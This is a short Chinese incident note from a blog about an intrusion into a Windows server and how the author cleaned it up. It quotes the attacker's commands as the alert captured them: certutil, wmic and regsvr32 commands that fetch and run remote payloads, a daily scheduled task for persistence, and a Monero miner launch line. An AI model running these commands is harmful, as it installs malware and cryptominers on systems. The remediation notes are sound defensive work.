一次应用入侵
作者:互联网
服务器报警
命令行: cmd.exe /c "certutil.exe -urlcache -split -f http://146.196.83.217:29324/winTask.exe C:WindowsTempwinTask.exe"
命令行: C:\Windows\System32\Wbem\wmic.EXE os get /format:"http://sec.dashabi.in/javaw2/net/net.xsl"
进程路径: C:/Windows/System32/wbem/WMIC.exe
进程ID: 8544
父进程命令行: taskeng.exe {91BBC158-F18D-4E4A-8D69-117DF5612003} S-1-5-18:NT AUTHORITY\System:Service:
命令行: schtasks /create /tn SystemProcessDebug /tr "certutil.exe -urlcache -split -f http://118.190.211.34:82/image/png/winTask.exe C:\Window\Temp\winTask.exe & C:\Windows\Temp\winTask.exe" /sc daily
进程PID: 10736
进程文件名: schtasks.exe
c:/windows/temp/core/core.exe
命令行参数: C:\Windows\Temp\core\core.exe --coin monero -o xmr.f2pool.com:13531 -u 46YngqQEZQ6HYhqP7noesGdoecXZRM2jR16t7RKTbhW4TtqdKUQyggs3x7pADEWvpr5ySbesyQQwJfaHbewXurEWNdeWNtj.gtest -p x -k -B --donate-level=1 --cpu-max-threads-hint=70
类型: Task Scheduler(计划任务)
路径: \Microsoft\Windows\MUI\LMRemover
内容: regsvr32 /u /s /i:http://sec.dashabi.in/javaw2/instance.xsl scrobj.dll
事件说明: 检测模型发现您服务器上的某些自启动项可疑,可能是恶意软件或者黑客在入侵后进行的持久化痕迹。
这个没看明白 https://www.cnblogs.com/backlion/p/10489521.html
将ip 加入黑名单,将域名加到hosts中指向127.0.0.1
?将schtasks.exe 文件改为非admin可执行 需要trustedinstaller提供的权限
==>
新建管理员用户,登录,对该文件 属性--安全--所有者--编辑换成当前用户 然后再更改权限
?删除定时任务
chcp 437
schtasks /query /fo LIST /v |findstr http
标签:core,一次,http,--,Windows,exe,应用,入侵,schtasks 来源: https://www.cnblogs.com/qtong/p/14856070.html